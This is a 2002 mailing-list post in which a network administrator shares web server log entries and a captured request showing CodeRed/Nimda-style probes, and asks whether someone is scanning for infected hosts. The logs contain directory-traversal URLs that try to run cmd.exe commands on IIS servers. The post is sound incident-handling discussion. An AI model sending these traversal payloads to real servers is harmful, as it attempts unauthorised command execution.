Security Incidents mailing list archives

Previous By Date Next
Previous By Thread Next

Someone looking for CodeRed infected boxes ?

From: "Maxime Ducharme" <maxime () pandore-design com>
Date: Wed, 26 Jun 2002 10:18:36 -0400
Hi,
    i just noticed some Codered similar attacks on our web server
which seem to have more headers :

1.
2002-06-26 09:14:15 212.179.220.111 - 192.168.100.2 80 GET
/winnt/system32/cmd.exe /c+dir+c:\ 404 2526 206 0 HTTP/1.1
65.94.25.135 - - -
2002-06-26 09:14:15 212.179.220.111 - 192.168.100.2 80 GET
/scripts/.%2e/.%2e/winnt/system32/cmd.exe /c+dir+c:\ 404 2526 209 0 HTTP/1.1
65.94.25.135 - - -

Sent packet show :

GET /scripts/.%2e/.%2e/winnt/system32/cmd.exe?/c+dir+c:\ c:\ HTTP/1.1
Host: 65.94.25.135
Connection: keep-alive
Accept: */*
X-Forwarded-For: 212.179.220.111
Via: 1.1 proxy2 (NetCache NetApp/5.2.1R1D3)


The proxy is relaying itself ? not much sense
The worm generated header on-the-fly ?



2.
2002-06-26 03:00:38 80.15.26.241 - 192.168.100.2 80 GET
/scripts/..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 404 2526 394 0 HTTP/1.1
65.94.25.135
Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+KITV4.7+Wanadoo) - -

This one have a User Agent in it, would it be someone scanning for codered /
nimda infected boxes ?

I did not see any with a Proxy ou User-agent headers yet, maybe i'm just not
well informed ;-)

Thanks for any tip

---------------------------------------------------------------
  Maxime Ducharme
  Administrateur reseau, Programmeur
  E-Mail : maxime () pandore-design com
  Clé publique PGP : http://pandore-design.com/pgp/maxime.asc
  Pandore-Design [http://www.pandore-design.com]
  Tel : (866) 961-9321
  Fax : (866) 961-9943


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com
Previous By Date Next
Previous By Thread Next

Current thread: